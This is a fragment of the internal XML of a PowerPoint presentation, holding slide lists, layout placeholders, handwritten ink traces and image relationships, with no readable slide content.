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6"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="262" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="454" r:id="rId8"/>
    <p:sldId id="261" r:id="rId9"/>
    <p:sldId id="263" r:id="rId10"/>
    <p:sldId id="264" r:id="rId11"/>
    <p:sldId id="265" r:id="rId12"/>
    <p:sldId id="267" r:id="rId13"/>
    <p:sldId id="268" r:id="rId14"/>
    <p:sldId id="269" r:id="rId15"/>
    <p:sldId id="266" r:id="rId16"/>
    <p:sldId id="270" r:id="rId17"/>
    <p:sldId id="274" r:id="rId18"/>
    <p:sldId id="455" r:id="rId19"/>
    <p:sldId id="275" r:id="rId20"/>
    <p:sldId id="456" r:id="rId21"/>
    <p:sldId id="276" r:id="rId22"/>
    <p:sldId id="457" r:id="rId23"/>
    <p:sldId id="271" r:id="rId24"/>
    <p:sldId id="272"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3" r:id="rId61"/>
    <p:sldId id="312"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7" r:id="rId75"/>
    <p:sldId id="329" r:id="rId76"/>
    <p:sldId id="328" r:id="rId77"/>
    <p:sldId id="326" r:id="rId78"/>
    <p:sldId id="330" r:id="rId79"/>
    <p:sldId id="331" r:id="rId80"/>
    <p:sldId id="332" r:id="rId81"/>
    <p:sldId id="333" r:id="rId82"/>
    <p:sldId id="334" r:id="rId83"/>
    <p:sldId id="335" r:id="rId84"/>
    <p:sldId id="336" r:id="rId85"/>
    <p:sldId id="337" r:id="rId86"/>
    <p:sldId id="461" r:id="rId87"/>
    <p:sldId id="338" r:id="rId88"/>
    <p:sldId id="339" r:id="rId89"/>
    <p:sldId id="462" r:id="rId90"/>
    <p:sldId id="340" r:id="rId91"/>
    <p:sldId id="460" r:id="rId92"/>
    <p:sldId id="463" r:id="rId93"/>
    <p:sldId id="341" r:id="rId94"/>
    <p:sldId id="464" r:id="rId95"/>
    <p:sldId id="458" r:id="rId96"/>
    <p:sldId id="459" r:id="rId97"/>
    <p:sldId id="465" r:id="rId98"/>
    <p:sldId id="467" r:id="rId99"/>
    <p:sldId id="468" r:id="rId100"/>
    <p:sldId id="469" r:id="rId101"/>
    <p:sldId id="470" r:id="rId102"/>
    <p:sldId id="471" r:id="rId103"/>
    <p:sldId id="472" r:id="rId104"/>
    <p:sldId id="473" r:id="rId105"/>
    <p:sldId id="474" r:id="rId106"/>
    <p:sldId id="475" r:id="rId107"/>
    <p:sldId id="476" r:id="rId108"/>
    <p:sldId id="477" r:id="rId109"/>
    <p:sldId id="466" r:id="rId110"/>
    <p:sldId id="343" r:id="rId111"/>
    <p:sldId id="344" r:id="rId112"/>
    <p:sldId id="345" r:id="rId113"/>
    <p:sldId id="346" r:id="rId114"/>
    <p:sldId id="347" r:id="rId115"/>
    <p:sldId id="348" r:id="rId116"/>
    <p:sldId id="349" r:id="rId117"/>
    <p:sldId id="350" r:id="rId118"/>
    <p:sldId id="352" r:id="rId119"/>
    <p:sldId id="353" r:id="rId120"/>
    <p:sldId id="354" r:id="rId121"/>
    <p:sldId id="355" r:id="rId122"/>
    <p:sldId id="357" r:id="rId123"/>
    <p:sldId id="359" r:id="rId124"/>
    <p:sldId id="360" r:id="rId125"/>
    <p:sldId id="361" r:id="rId126"/>
    <p:sldId id="362" r:id="rId127"/>
    <p:sldId id="363" r:id="rId128"/>
    <p:sldId id="364" r:id="rId129"/>
    <p:sldId id="366" r:id="rId130"/>
    <p:sldId id="367" r:id="rId131"/>
    <p:sldId id="368" r:id="rId132"/>
    <p:sldId id="370" r:id="rId133"/>
    <p:sldId id="369" r:id="rId134"/>
    <p:sldId id="371" r:id="rId135"/>
    <p:sldId id="372" r:id="rId136"/>
    <p:sldId id="373" r:id="rId137"/>
    <p:sldId id="374" r:id="rId138"/>
    <p:sldId id="375" r:id="rId139"/>
    <p:sldId id="376" r:id="rId140"/>
    <p:sldId id="377" r:id="rId141"/>
    <p:sldId id="378" r:id="rId142"/>
    <p:sldId id="379" r:id="rId143"/>
    <p:sldId id="380" r:id="rId144"/>
    <p:sldId id="381" r:id="rId145"/>
    <p:sldId id="382" r:id="rId146"/>
    <p:sldId id="384" r:id="rId147"/>
    <p:sldId id="383" r:id="rId148"/>
    <p:sldId id="385" r:id="rId149"/>
    <p:sldId id="386" r:id="rId150"/>
    <p:sldId id="387" r:id="rId151"/>
    <p:sldId id="388" r:id="rId152"/>
    <p:sldId id="389" r:id="rId153"/>
    <p:sldId id="390" r:id="rId154"/>
    <p:sldId id="391" r:id="rId155"/>
    <p:sldId id="478" r:id="rId156"/>
    <p:sldId id="479" r:id="rId157"/>
    <p:sldId id="480" r:id="rId158"/>
    <p:sldId id="481" r:id="rId159"/>
    <p:sldId id="482" r:id="rId160"/>
    <p:sldId id="483" r:id="rId161"/>
    <p:sldId id="484" r:id="rId162"/>
    <p:sldId id="430" r:id="rId163"/>
    <p:sldId id="431" r:id="rId164"/>
    <p:sldId id="432" r:id="rId165"/>
    <p:sldId id="433" r:id="rId166"/>
    <p:sldId id="434" r:id="rId167"/>
    <p:sldId id="435" r:id="rId168"/>
    <p:sldId id="436" r:id="rId169"/>
    <p:sldId id="437" r:id="rId170"/>
    <p:sldId id="438" r:id="rId171"/>
    <p:sldId id="439" r:id="rId172"/>
    <p:sldId id="440" r:id="rId173"/>
    <p:sldId id="442" r:id="rId174"/>
    <p:sldId id="443" r:id="rId175"/>
    <p:sldId id="441" r:id="rId176"/>
    <p:sldId id="444" r:id="rId177"/>
    <p:sldId id="446" r:id="rId178"/>
    <p:sldId id="445" r:id="rId179"/>
    <p:sldId id="447" r:id="rId180"/>
    <p:sldId id="448" r:id="rId181"/>
    <p:sldId id="449" r:id="rId182"/>
    <p:sldId id="450" r:id="rId183"/>
    <p:sldId id="451" r:id="rId184"/>
    <p:sldId id="452" r:id="rId185"/>
    <p:sldId id="485" r:id="rId186"/>
    <p:sldId id="392" r:id="rId187"/>
    <p:sldId id="393" r:id="rId188"/>
    <p:sldId id="394" r:id="rId189"/>
    <p:sldId id="395" r:id="rId190"/>
    <p:sldId id="396" r:id="rId191"/>
    <p:sldId id="397" r:id="rId192"/>
    <p:sldId id="398" r:id="rId193"/>
    <p:sldId id="399" r:id="rId194"/>
    <p:sldId id="400" r:id="rId195"/>
    <p:sldId id="401" r:id="rId196"/>
    <p:sldId id="402" r:id="rId197"/>
    <p:sldId id="403" r:id="rId198"/>
    <p:sldId id="404" r:id="rId199"/>
    <p:sldId id="405" r:id="rId200"/>
    <p:sldId id="406" r:id="rId201"/>
    <p:sldId id="407" r:id="rId202"/>
    <p:sldId id="408" r:id="rId203"/>
    <p:sldId id="409" r:id="rId204"/>
    <p:sldId id="410" r:id="rId205"/>
    <p:sldId id="412" r:id="rId206"/>
    <p:sldId id="413" r:id="rId207"/>
    <p:sldId id="414" r:id="rId208"/>
    <p:sldId id="415" r:id="rId209"/>
    <p:sldId id="416" r:id="rId210"/>
    <p:sldId id="417" r:id="rId211"/>
    <p:sldId id="418" r:id="rId212"/>
    <p:sldId id="419" r:id="rId213"/>
    <p:sldId id="420" r:id="rId214"/>
    <p:sldId id="421" r:id="rId215"/>
    <p:sldId id="422" r:id="rId216"/>
    <p:sldId id="424" r:id="rId217"/>
    <p:sldId id="425" r:id="rId218"/>
    <p:sldId id="426" r:id="rId219"/>
    <p:sldId id="427" r:id="rId220"/>
    <p:sldId id="428" r:id="rId221"/>
    <p:sldId id="429" r:id="rId222"/>
    <p:sldId id="487" r:id="rId223"/>
    <p:sldId id="488" r:id="rId224"/>
    <p:sldId id="453" r:id="rId225"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5715000" type="screen16x10"/>
  <p:notesSz cx="9144000" cy="5715000"/>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr kern="0"/>
    </a:defPPr>
  </p:defaultTextStyle>
  <p:extLst>
    <p:ext uri="{521415D9-36F7-43E2-AB2F-B90AF26B5E84}">
      <p14:sectionLst xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
        <p14:section name="Default Section" id="{42686356-FD48-460E-8304-4728EF2DB7AC}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
            <p14:sldId id="257"/>
            <p14:sldId id="258"/>
            <p14:sldId id="259"/>
            <p14:sldId id="262"/>
            <p14:sldId id="260"/>
            <p14:sldId id="454"/>
            <p14:sldId id="261"/>
            <p14:sldId id="263"/>
            <p14:sldId id="264"/>
            <p14:sldId id="265"/>
            <p14:sldId id="267"/>
            <p14:sldId id="268"/>
            <p14:sldId id="269"/>
            <p14:sldId id="266"/>
            <p14:sldId id="270"/>
            <p14:sldId id="274"/>
            <p14:sldId id="455"/>
            <p14:sldId id="275"/>
            <p14:sldId id="456"/>
            <p14:sldId id="276"/>
            <p14:sldId id="457"/>
            <p14:sldId id="271"/>
            <p14:sldId id="272"/>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3"/>
            <p14:sldId id="312"/>
            <p14:sldId id="314"/>
            <p14:sldId id="315"/>
            <p14:sldId id="316"/>
            <p14:sldId id="317"/>
            <p14:sldId id="318"/>
            <p14:sldId id="319"/>
            <p14:sldId id="320"/>
            <p14:sldId id="321"/>
            <p14:sldId id="322"/>
            <p14:sldId id="323"/>
            <p14:sldId id="324"/>
            <p14:sldId id="325"/>
            <p14:sldId id="327"/>
            <p14:sldId id="329"/>
            <p14:sldId id="328"/>
            <p14:sldId id="326"/>
            <p14:sldId id="330"/>
            <p14:sldId id="331"/>
            <p14:sldId id="332"/>
            <p14:sldId id="333"/>
            <p14:sldId id="334"/>
            <p14:sldId id="335"/>
            <p14:sldId id="336"/>
            <p14:sldId id="337"/>
            <p14:sldId id="461"/>
            <p14:sldId id="338"/>
            <p14:sldId id="339"/>
            <p14:sldId id="462"/>
            <p14:sldId id="340"/>
            <p14:sldId id="460"/>
            <p14:sldId id="463"/>
            <p14:sldId id="341"/>
            <p14:sldId id="464"/>
            <p14:sldId id="458"/>
            <p14:sldId id="459"/>
            <p14:sldId id="465"/>
            <p14:sldId id="467"/>
            <p14:sldId id="468"/>
            <p14:sldId id="469"/>
            <p14:sldId id="470"/>
            <p14:sldId id="471"/>
            <p14:sldId id="472"/>
            <p14:sldId id="473"/>
            <p14:sldId id="474"/>
            <p14:sldId id="475"/>
            <p14:sldId id="476"/>
            <p14:sldId id="477"/>
            <p14:sldId id="466"/>
            <p14:sldId id="343"/>
            <p14:sldId id="344"/>
            <p14:sldId id="345"/>
            <p14:sldId id="346"/>
            <p14:sldId id="347"/>
            <p14:sldId id="348"/>
            <p14:sldId id="349"/>
            <p14:sldId id="350"/>
            <p14:sldId id="352"/>
            <p14:sldId id="353"/>
            <p14:sldId id="354"/>
            <p14:sldId id="355"/>
            <p14:sldId id="357"/>
            <p14:sldId id="359"/>
            <p14:sldId id="360"/>
            <p14:sldId id="361"/>
            <p14:sldId id="362"/>
            <p14:sldId id="363"/>
            <p14:sldId id="364"/>
            <p14:sldId id="366"/>
            <p14:sldId id="367"/>
            <p14:sldId id="368"/>
            <p14:sldId id="370"/>
            <p14:sldId id="369"/>
            <p14:sldId id="371"/>
            <p14:sldId id="372"/>
            <p14:sldId id="373"/>
            <p14:sldId id="374"/>
            <p14:sldId id="375"/>
            <p14:sldId id="376"/>
            <p14:sldId id="377"/>
            <p14:sldId id="378"/>
            <p14:sldId id="379"/>
            <p14:sldId id="380"/>
            <p14:sldId id="381"/>
            <p14:sldId id="382"/>
            <p14:sldId id="384"/>
            <p14:sldId id="383"/>
            <p14:sldId id="385"/>
            <p14:sldId id="386"/>
            <p14:sldId id="387"/>
            <p14:sldId id="388"/>
            <p14:sldId id="389"/>
            <p14:sldId id="390"/>
            <p14:sldId id="391"/>
            <p14:sldId id="478"/>
            <p14:sldId id="479"/>
            <p14:sldId id="480"/>
            <p14:sldId id="481"/>
            <p14:sldId id="482"/>
            <p14:sldId id="483"/>
            <p14:sldId id="484"/>
            <p14:sldId id="430"/>
            <p14:sldId id="431"/>
            <p14:sldId id="432"/>
            <p14:sldId id="433"/>
            <p14:sldId id="434"/>
            <p14:sldId id="435"/>
            <p14:sldId id="436"/>
            <p14:sldId id="437"/>
            <p14:sldId id="438"/>
            <p14:sldId id="439"/>
            <p14:sldId id="440"/>
            <p14:sldId id="442"/>
            <p14:sldId id="443"/>
            <p14:sldId id="441"/>
            <p14:sldId id="444"/>
            <p14:sldId id="446"/>
            <p14:sldId id="445"/>
            <p14:sldId id="447"/>
            <p14:sldId id="448"/>
            <p14:sldId id="449"/>
            <p14:sldId id="450"/>
            <p14:sldId id="451"/>
            <p14:sldId id="452"/>
            <p14:sldId id="485"/>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2"/>
            <p14:sldId id="413"/>
            <p14:sldId id="414"/>
            <p14:sldId id="415"/>
            <p14:sldId id="416"/>
            <p14:sldId id="417"/>
            <p14:sldId id="418"/>
            <p14:sldId id="419"/>
            <p14:sldId id="420"/>
            <p14:sldId id="421"/>
            <p14:sldId id="422"/>
            <p14:sldId id="424"/>
            <p14:sldId id="425"/>
            <p14:sldId id="426"/>
            <p14:sldId id="427"/>
            <p14:sldId id="428"/>
            <p14:sldId id="429"/>
            <p14:sldId id="487"/>
            <p14:sldId id="488"/>
            <p14:sldId id="45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95" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="50" d="100"/>
          <a:sy n="50" d="100"/>
        </p:scale>
        <p:origin x="1086"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1T14:18:08.013"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.035" units="cm"/>
      <inkml:brushProperty name="height" value="0.035" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0 24575,'1589'0'0,"-1563"2"0,0 0 0,48 13 0,-46-9 0,0-1 0,36 2 0,303-6 0,-169-3 0,-188 2-273,1 0 0,-1-1 0,0 0 0,12-3 0,1-4-6553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1T14:18:09.193"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.035" units="cm"/>
      <inkml:brushProperty name="height" value="0.035" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">776 0 24063,'-775'459'0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1T14:18:14.430"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.035" units="cm"/>
      <inkml:brushProperty name="height" value="0.035" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 1 24575,'151'132'0,"-125"-108"0,47 33 0,-43-35 0,37 35 0,-25-16 0,86 64 0,-101-87 0,2-2 0,59 26 0,-50-26 0,84 48 0,-74-43-1365,-27-12-5461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1T14:18:16.449"/>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14:18:43.0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77,'919'0,"-892"2,0 0,45 12,-43-8,1-1,31 2,637-6,-337-3,-272 3,103-3,-181 0,0 0,-1-1,1 0,-1-1,0 0,0 0,11-8,-10 6,-1 1,1 0,0 0,0 1,22-4,60-1,-55 6,52-10,-28 4,1 3,-1 2,102 8,-34-1,929-3,-1024 1,1 3,39 8,-37-5,60 4,61-13,69 4,-143 15,-63-11,0-2,27 4,89 9,-87-9,75 3,1322-12,-1421 2,0 2,46 11,-44-8,0-1,32 1,-22-5,-1 2,76 15,-60-10,0-1,1-3,-1-3,57-5,6 2,730 2,-821-2,0-1,48-11,-46 8,0 1,36-2,-11 6,-12 0,1 0,0-3,41-9,43-20,58-12,-159 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14:20:47.323"/>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1,'0'11359,"0"-11328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85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85750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{27342C74-D0C5-4AFE-A284-4E9DD4091628}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/22/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Image Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3028950" y="714375"/>
            <a:ext cx="3086100" cy="19288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751138"/>
            <a:ext cx="7315200" cy="22494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429250"/>
            <a:ext cx="3962400" cy="285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5429250"/>
            <a:ext cx="3962400" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{DC0C6ABD-40A4-4A56-B4F8-10524CA19317}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1766968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0C6ABD-40A4-4A56-B4F8-10524CA19317}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="386497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0C6ABD-40A4-4A56-B4F8-10524CA19317}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>212</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="210440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5940" y="295478"/>
            <a:ext cx="5600065" cy="666115"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4200" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="006633"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Holder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3200400"/>
            <a:ext cx="6400800" cy="1428750"/>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Garamond"/>
                <a:cs typeface="Garamond"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="38100">
              <a:lnSpc>
                <a:spcPts val="1375"/>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1000" y="190500"/>
            <a:ext cx="8229600" cy="508000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8229600" h="508000">
                <a:moveTo>
                  <a:pt x="0" y="508000"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8229600" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="CC99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200" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="00663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Garamond"/>
                <a:cs typeface="Garamond"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="38100">
              <a:lnSpc>
                <a:spcPts val="1375"/>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006633"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Holder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1314450"/>
            <a:ext cx="3977640" cy="377190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314450"/>
            <a:ext cx="3977640" cy="377190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Garamond"/>
                <a:cs typeface="Garamond"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="38100">
              <a:lnSpc>
                <a:spcPts val="1375"/>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00663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Garamond"/>
                <a:cs typeface="Garamond"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="38100">
              <a:lnSpc>
                <a:spcPts val="1375"/>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Garamond"/>
                <a:cs typeface="Garamond"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="38100">
              <a:lnSpc>
                <a:spcPts val="1375"/>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1000" y="190500"/>
            <a:ext cx="8229600" cy="508000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8229600" h="508000">
                <a:moveTo>
                  <a:pt x="0" y="508000"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8229600" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="CC9900"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="bg object 17"/>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2" name="Holder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535940" y="295478"/>
            <a:ext cx="7051040" cy="666115"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4200" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="006633"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Holder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="444500" y="1222628"/>
            <a:ext cx="8255000" cy="3976370"/>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5314950"/>
            <a:ext cx="2926080" cy="2857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5314950"/>
            <a:ext cx="2103120" cy="2857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6" name="Holder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8413750" y="5353027"/>
            <a:ext cx="232409" cy="196850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1200" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Garamond"/>
                <a:cs typeface="Garamond"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="38100">
              <a:lnSpc>
                <a:spcPts val="1375"/>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0.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image390.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink5.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410.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image380.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43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00.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink6.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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1016000"/>
            <a:ext cx="7924800" cy="762000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7924800" h="762000">
                <a:moveTo>
                  <a:pt x="0" y="762000"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7924800" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="CC9900"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="3302000"/>
            <a:ext cx="6511925" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6511925">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6511925" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="CC9900"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="721360" y="1217172"/>
            <a:ext cx="7924799" cy="1951816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="5715" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
